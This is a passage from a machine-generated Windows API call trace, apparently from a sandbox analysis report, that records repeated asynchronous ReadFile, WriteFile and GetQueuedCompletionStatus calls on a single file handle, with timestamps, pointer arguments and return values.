lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0141.906] WriteFile (in: hFile=0x610, lpBuffer=0x41f0124*, nNumberOfBytesToWrite=0x80000, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020) returned 1 [0141.907] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0141.907] ReadFile (in: hFile=0x610, lpBuffer=0x41f0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesRead=0x3fdf908*=0x0, lpOverlapped=0x41f0020) returned 1 [0141.909] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0141.910] WriteFile (in: hFile=0x610, lpBuffer=0x41f0124*, nNumberOfBytesToWrite=0x80000, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020) returned 1 [0141.912] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0141.912] ReadFile (in: hFile=0x610, lpBuffer=0x41f0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesRead=0x3fdf908*=0x0, lpOverlapped=0x41f0020) returned 1 [0141.922] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0141.923] WriteFile (in: hFile=0x610, lpBuffer=0x41f0124*, nNumberOfBytesToWrite=0x80000, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020) returned 1 [0141.925] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0141.925] ReadFile (in: hFile=0x610, lpBuffer=0x41f0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesRead=0x3fdf908*=0x0, lpOverlapped=0x41f0020) returned 1 [0141.926] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0141.934] WriteFile (in: hFile=0x610, lpBuffer=0x41f0124*, nNumberOfBytesToWrite=0x80000, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020) returned 1 [0141.935] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0141.935] ReadFile (in: hFile=0x610, lpBuffer=0x41f0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesRead=0x3fdf908*=0x0, lpOverlapped=0x41f0020) returned 1 [0141.974] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0141.976] WriteFile (in: hFile=0x610, lpBuffer=0x41f0124*, nNumberOfBytesToWrite=0x80000, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020) returned 1 [0141.977] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0141.977] ReadFile (in: hFile=0x610, lpBuffer=0x41f0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesRead=0x3fdf908*=0x0, lpOverlapped=0x41f0020) returned 1 [0141.978] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0141.980] WriteFile (in: hFile=0x610, lpBuffer=0x41f0124*, nNumberOfBytesToWrite=0x80000, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020) returned 1 [0141.981] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0141.981] ReadFile (in: hFile=0x610, lpBuffer=0x41f0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesRead=0x3fdf908*=0x0, lpOverlapped=0x41f0020) returned 1 [0141.991] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0141.993] WriteFile (in: hFile=0x610, lpBuffer=0x41f0124*, nNumberOfBytesToWrite=0x80000, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020) returned 1 [0141.994] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0141.994] ReadFile (in: hFile=0x610, lpBuffer=0x41f0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesRead=0x3fdf908*=0x0, lpOverlapped=0x41f0020) returned 1 [0141.995] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0141.997] WriteFile (in: hFile=0x610, lpBuffer=0x41f0124*, nNumberOfBytesToWrite=0x80000, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020) returned 1 [0141.998] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0141.998] ReadFile (in: hFile=0x610, lpBuffer=0x41f0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesRead=0x3fdf908*=0x0, lpOverlapped=0x41f0020) returned 1 [0142.026] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0142.027] WriteFile (in: hFile=0x610, lpBuffer=0x41f0124*, nNumberOfBytesToWrite=0x80000, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020) returned 1 [0142.028] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0142.028] ReadFile (in: hFile=0x610, lpBuffer=0x41f0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesRead=0x3fdf908*=0x0, lpOverlapped=0x41f0020) returned 1 [0142.034] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0142.036] WriteFile (in: hFile=0x610, lpBuffer=0x41f0124*, nNumberOfBytesToWrite=0x80000, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020) returned 1 [0142.038] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0142.038] ReadFile (in: hFile=0x610, lpBuffer=0x41f0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesRead=0x3fdf908*=0x0, lpOverlapped=0x41f0020) returned 1 [0142.063] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0142.065] WriteFile (in: hFile=0x610, lpBuffer=0x41f0124*, nNumberOfBytesToWrite=0x80000, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020) returned 1 [0142.066] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0142.066] ReadFile (in: hFile=0x610, lpBuffer=0x41f0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesRead=0x3fdf908*=0x0, lpOverlapped=0x41f0020) returned 1 [0142.068] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0142.070] WriteFile (in: hFile=0x610, lpBuffer=0x41f0124*, nNumberOfBytesToWrite=0x80000, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020) returned 1 [0142.071] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0142.071] ReadFile (in: hFile=0x610, lpBuffer=0x41f0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesRead=0x3fdf908*=0x0, lpOverlapped=0x41f0020) returned 1 [0142.080] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0142.082] WriteFile (in: hFile=0x610, lpBuffer=0x41f0124*, nNumberOfBytesToWrite=0x80000, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020) returned 1 [0142.083] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0142.083] ReadFile (in: hFile=0x610, lpBuffer=0x41f0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesRead=0x3fdf908*=0x0, lpOverlapped=0x41f0020) returned 1 [0142.093] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0142.095] WriteFile (in: hFile=0x610, lpBuffer=0x41f0124*, nNumberOfBytesToWrite=0x80000, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020) returned 1 [0142.096] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0142.096] ReadFile (in: hFile=0x610, lpBuffer=0x41f0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesRead=0x3fdf908*=0x0, lpOverlapped=0x41f0020) returned 1 [0142.115] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0142.117] WriteFile (in: hFile=0x610, lpBuffer=0x41f0124*, nNumberOfBytesToWrite=0x80000, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020) returned 1 [0142.118] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0142.118] ReadFile (in: hFile=0x610, lpBuffer=0x41f0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesRead=0x3fdf908*=0x0, lpOverlapped=0x41f0020) returned 1 [0142.128] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0142.129] WriteFile (in: hFile=0x610, lpBuffer=0x41f0124*, nNumberOfBytesToWrite=0x80000, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020) returned 1 [0142.131] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0142.131] ReadFile (in: hFile=0x610, lpBuffer=0x41f0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesRead=0x3fdf908*=0x0, lpOverlapped=0x41f0020) returned 1 [0142.144] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0142.145] WriteFile (in: hFile=0x610, lpBuffer=0x41f0124*, nNumberOfBytesToWrite=0x80000, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020) returned 1 [0142.188] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0142.188] ReadFile (in: hFile=0x610, lpBuffer=0x41f0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesRead=0x3fdf908*=0x0, lpOverlapped=0x41f0020) returned 1 [0142.190] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0142.191] WriteFile (in: hFile=0x610, lpBuffer=0x41f0124*, nNumberOfBytesToWrite=0x80000, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020) returned 1 [0142.193] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0142.193] ReadFile (in: hFile=0x610, lpBuffer=0x41f0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesRead=0x3fdf908*=0x0, lpOverlapped=0x41f0020) returned 1 [0142.203] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0142.204] WriteFile (in: hFile=0x610, lpBuffer=0x41f0124*, nNumberOfBytesToWrite=0x80000, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020) returned 1 [0142.205] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0142.205] ReadFile (in: hFile=0x610, lpBuffer=0x41f0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesRead=0x3fdf908*=0x0, lpOverlapped=0x41f0020) returned 1 [0142.207] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0142.208] WriteFile (in: hFile=0x610, lpBuffer=0x41f0124*, nNumberOfBytesToWrite=0x80000, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020) returned 1 [0142.210] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0142.210] ReadFile (in: hFile=0x610, lpBuffer=0x41f0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesRead=0x3fdf908*=0x0, lpOverlapped=0x41f0020) returned 1 [0142.219] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0142.221] WriteFile (in: hFile=0x610, lpBuffer=0x41f0124*, nNumberOfBytesToWrite=0x80000, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020) returned 1 [0142.222] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0142.222] ReadFile (in: hFile=0x610, lpBuffer=0x41f0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesRead=0x3fdf908*=0x0, lpOverlapped=0x41f0020) returned 1 [0142.224] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0142.239] WriteFile (in: hFile=0x610, lpBuffer=0x41f0124*, nNumberOfBytesToWrite=0x80000, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020) returned 1 [0142.240] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0142.240] ReadFile (in: hFile=0x610, lpBuffer=0x41f0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesRead=0x3fdf908*=0x0, lpOverlapped=0x41f0020) returned 1 [0142.258] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0142.259] WriteFile (in: hFile=0x610, lpBuffer=0x41f0124*, nNumberOfBytesToWrite=0x80000, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020) returned 1 [0142.260] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0142.260] ReadFile (in: hFile=0x610, lpBuffer=0x41f0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesRead=0x3fdf908*=0x0, lpOverlapped=0x41f0020) returned 1 [0142.270] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, 